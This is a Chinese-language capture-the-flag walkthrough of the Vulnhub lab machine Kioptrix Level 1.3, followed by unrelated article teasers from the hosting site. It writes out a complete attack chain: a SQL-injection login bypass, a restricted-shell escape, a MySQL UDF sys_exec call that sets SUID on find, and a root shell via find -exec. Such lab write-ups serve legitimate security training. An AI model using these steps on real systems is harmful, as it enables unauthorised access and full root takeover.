Vulnhub靶机:Kioptrix_Level1.3

news2024/11/17 23:55:33

一、介绍

运行环境:Virtualbox

攻击机:kali(192.168.56.101)

靶机:Kioptrix_Level1.3(192.168.56.109)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25

安装虚拟机:

由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘

选择自定义安装

在这里插入图片描述

操作系统选择linux,版本随便选一个,其他默认即可

在这里插入图片描述

将原来的硬盘删去,选择下载好的靶机硬盘替换原来的硬盘

在这里插入图片描述

直接打开虚拟机即可

在这里插入图片描述

二、信息收集

使用nmap主机发现靶机ip:192.168.56.109

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、139、445

nmap -A 192.168.56.109 -p 1-65535

在这里插入图片描述

打开网站,是一个登录页面,查看源码没有发现隐藏信息

在这里插入图片描述

直接dirsearch进行目录爆破,发现/database.sql文件

在这里插入图片描述

访问/database.sql文件,发现一组用户名密码:john:1234

在这里插入图片描述

但尝试使用该用户名密码登录网站和ssh均登录失败

回到登录页面,使用万能密码尝试登录,用户名:john、密码:a' or 1=1#,登录成功

在这里插入图片描述

得到一组用户名和密码:john:MyNameIsJohn

使用得到的用户名密码登录ssh

直接登录会报错

在这里插入图片描述

原因是靶机的ssh版本太老了,可以使用如下命令登录:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc john@192.168.56.109

在这里插入图片描述

登录后发现该用户命令和可访问的目录都被限制了

在这里插入图片描述

使用echo获取交互式shell

echo os.system("/bin/bash")

在这里插入图片描述

三、提权

查找靶机是否有特权命令,或是否存在可利用的具有root权限的文件,均未发现。

sudo -l
find / -perm -u=s -type f 2>/dev/null

翻一翻靶机各个文件夹,看有没有可利用的文件

/var/www/checklogin.php文件发现数据库的用户名密码

在这里插入图片描述

使用获得的用户名密码登录mysql

mysql -u root -p

在这里插入图片描述

查找数据库,发现robert用户的密码:ADGAdsafdfwt4gadfga==

在这里插入图片描述

切换为robert用户,但robert用户和john用户权限差不多

在这里插入图片描述

数据库版本为:5.0.51a-3ubuntu5.4,登录权限为数据库管理员权限,我们可以使用udf提权

查看数据库,发现数据库已经定义了sys_evec函数,该函数可以执行系统任意命令

use mysql;
select * from mysql.func;

在这里插入图片描述

我们可以给find命令所有者的suid权限,使其可以执行root命令

select sys_exec('chmod u+s /usr/bin/find');

在这里插入图片描述

再次执行命令find / -perm -u=s -type f 2>/dev/null查看具有root权限的二进制文件,find命令添加成功

在这里插入图片描述

使用find命令提权

/usr/bin/find . -exec /bin/bash -p \; -quit

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1526078.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

大规模采集主流电商平台商品详情页获取商品详情,SKU,价格操作流程

taobao API 接入 参数说明 通用参数说明 参数不要乱传,否则不管成功失败都会扣费url说明 n/平台/API类型/ 平台:淘宝,京东等, API类型:[item_search,item_get,item_search_shop等]version:API版本key:调用key,测试key:test_api_ke…

【周赛】第385场周赛

🔥博客主页: A_SHOWY🎥系列专栏:力扣刷题总结录 数据结构 云计算 数字图像处理 力扣每日一题_ 【1】100212.统计前后缀下标对 100212. 统计前后缀下标对 Ihttps://leetcode.cn/problems/count-prefix-and-suffix-pairs-i/ 熟…

【解读】Gartner 2023 DevOps平台魔法四象限

2023年6月5日Gartner发布了DevOps平台魔法四象限洞察报告(Magic Quadrant for DevOps Platforms DevOps),Gartner指出,DevOps平台正在成为DevOps工具链的一种更简单的替代品,为组织提供一套整合的集成能力。软件工程领…

力扣Lc17--- 345.反转字符串中的元音字母(java版)-2024年3月18日

1.题目 2.知识点 注1: indexOf() 是 Java 中 String 类的方法之一,它用于查找指定字符或字符串在字符串中第一次出现的位置。如果找到了该字符或字符串,则返回它在字符串中的索引位置(从0开始),如果没有找…

【Linux下qt软件安装打包附带问题: dpkg: error processing package xxxx +解决方式+自我尝试+记录】

【Linux下qt软件安装打包附带问题: dpkg: error processing package xxxx 解决方式自我尝试记录】 1、前言2、实验环境3、问题说明4、我的努力与查到解决的方式(1)补充两个文件,让软件正常执行(2)尝试修复d…

Elasticsearch8.x版本Java客户端Elasticsearch Java API 如何并发修改

前言 并发控制,一般有两种方案,悲观锁和乐观锁,其中悲观锁是默认每次更新操作肯定会冲突,所以每次操作都要先获取锁,操作完毕再释放锁,适用于写比较多的场景。而乐观锁是默认每次更新操作都不会冲突&#…

51单片机学习笔记6 数码管显示

51单片机学习笔记5 数码管显示 一、动态数码管1. 动态数码管工作原理2. 工作过程3. 原理图(1)数码管及74HC245(2)74HC138译码器 4. 74HC245介绍(1)**功能**(2)**引脚**(3…

文件操作和异常处理1-读写文件

Python 之 lambda 函数完整详解 & 巧妙运用: https://blog.csdn.net/PY0312/article/details/88956795

jeecg启动Sentinel 一直是空白页面 解决办法用 外部 Sentinel SpringCloud之Sentinel概述和安装及简单整合

jeecg启动Sentinel 一直是空白页面 解决办法用 外部 Sentinel SpringCloud之Sentinel概述和安装及简单整合 文章目录 jeecg启动Sentinel 一直是空白页面 解决办法用 外部 Sentinel SpringCloud之Sentinel概述和安装及简单整合 Sentinel概述基本介绍 Sentinel安装下载地址: http…

Spring boot2.7整合jetcache方法缓存

前面的文章 我们讲了 spring boot 整合 jetcache 做基本字符串数据缓存 但是 我这里有个这样的逻辑 我的 domain 包下 有一个 book 属性类 里面就 id 和 name 属性 设置了 对应的 set get函数 和一个整体的构造函数 package com.example.javadom.domain;public class book {pr…

一些 AI 工具

AI 搜索:Phind,perplexity AI聊天大模型:chatgpt, kimi(国内可用,支持上传文件) AI 机器人:https://www.coze.com/ AI工具集;https://ai-bot.cn/#term-2 agent GPT&a…

Windows错误码2503

2503错误码通常出现在Windows系统中,指的是安装或卸载程序时遇到的错误。 2503错误码表示在安装或卸载程序时发生了一些错误,可能是由于权限不足或某些文件被占用等原因导致的。 解决这个的方法包括: 1.以管理员运行程序安装。 2.如果程序右…

批量缩放图片,按比例轻松调整,高效处理一键完成

在数字化时代,图片处理已成为我们日常生活和工作中不可或缺的一部分。无论是为了网页制作、社交媒体分享,还是为了打印照片、制作相册,我们都需要对图片进行各种调整和优化。其中,按比例缩放图片是一个常见的需求。 第一步&#…

在连续请求过程中,如何取消上次的请求?

前言 这个问题想必很多朋友都遇到过,我再详细说一下场景! 如 Boss 搜索框所示: 先输入1 再输入2 再输入3 再输入123 请求参数依次为:1 12 123 123123 请求参数通过右侧的 query 参数也可以看到,一共请求了四次。 不…

腾讯云优惠券领取的几种方法,助你降低云服务成本

随着云计算技术的广泛应用,越来越多的企业和个人选择使用云服务来降低运营成本、提高运营效率。腾讯云作为国内领先的云服务提供商,凭借其出色的性能、稳定性和安全性,赢得了广大用户的信赖。为了回馈用户,腾讯云经常推出各种优惠…

matlab simulink 工业汽轮机调节系统的模糊PID控制器设计

1、内容简介 略 72-可以交流、咨询、答疑 工业汽轮机调节系统的模糊PID控制器设计 工业汽轮机;调节系统;模糊PID;自调整论域 2、内容说明 略 摘要:针对汽轮机电、热栽荷存在不确定因素,简单的线性和非线性微分方程不能完全代表 实际调节系统&#…

数据库国产化探究及升级改造过程指导

一、背景 在信创“自主可控”的浪潮下,政企行业首当其冲,基于国产化信创的要求,本部门某业务后端应用也需要针对分析开源组件的风险和开源协议的商业应用限制;能用国产化替代的评估后尽可替代割接,本期针对传统数据库…

2024全新快递平台系统独立版小程序源码|带cps推广营销流量主+前端

2024全新快递平台系统独立版小程序源码|带cps推广营销流量主前端程序源码 程序介绍 快递代发快递代寄寄件小程序可以对接易达云洋一级总代 快递小程序,接入云洋/易达物流接口,支持选择快递公司,三通一达,极兔,德邦等&…

DensityCalculator 程序(1D 2D):通过 VMD 可计算 LAMMPS 轨迹的密度(一)

主要内容 “在分子动力学(MD)模拟中描述原子层面的结构信息是材料建模与模拟领域研究人员的一项必要任务。密度分布的可视化通常是结构表征中最重要的特性之一。可视化分子动力学(VMD)是一种广泛使用的分子可视化软件包&#xff…

vue中如何查看组件有哪些函数与变量

在开发的过程中,经常用到他人的框架,特别是开源框架比如element,uniapp等。其中就涉及到框架里对应的组件。而组件里又有哪些内置的函数,我们通常是去查官方文档。然后很多的时候需求的多样性,要改的地方也是不一样的,…